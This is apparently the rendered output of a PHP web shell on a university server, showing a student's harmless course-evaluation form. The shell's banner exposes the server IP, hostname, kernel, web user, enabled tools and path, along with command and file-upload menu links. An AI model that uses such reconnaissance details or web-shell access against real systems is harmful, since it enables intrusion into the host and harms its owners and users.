Server IP : 172.16.15.8 / Your IP : 18.118.227.199 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jhtaylor/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Assignment2B.html Author: Jack Taylor Instructor: Dr. Wang Due: Sunday Feb. 25, 2024 --> <!-- Assignment2BForm.php --> <html> <head> <title>Evaluation Questions</title> </head> <body> <h2>Evaluation Questions</h2> <form action="Assignment2BResult.php" method="post"> <?php // Retrieve data from previous form $firstName = $_POST['firstName']; $lastName = $_POST['lastName']; $CN = $_POST['CN']; $fullName = "$firstName $lastName"; ?> <input type="hidden" name="firstName" value="<?php echo htmlspecialchars($firstName); ?>"> <input type="hidden" name="lastName" value="<?php echo htmlspecialchars($lastName); ?>"> <input type="hidden" name="CN" value="<?php echo htmlspecialchars($CN); ?>"> <p>1. How satisfied are you with the course content?</p> <input type="radio" name="q1" value="Strongly Agree"> Strongly Agree <input type="radio" name="q1" value="Agree"> Agree <input type="radio" name="q1" value="Not Agree"> Not Agree<br><br> <p>2. How satisfied are you with the course instructor?</p> <input type="radio" name="q2" value="Strongly Agree"> Strongly Agree <input type="radio" name="q2" value="Agree"> Agree <input type="radio" name="q2" value="Not Agree"> Not Agree<br><br> <input type="submit" value="Submit"> </form> </body> </html>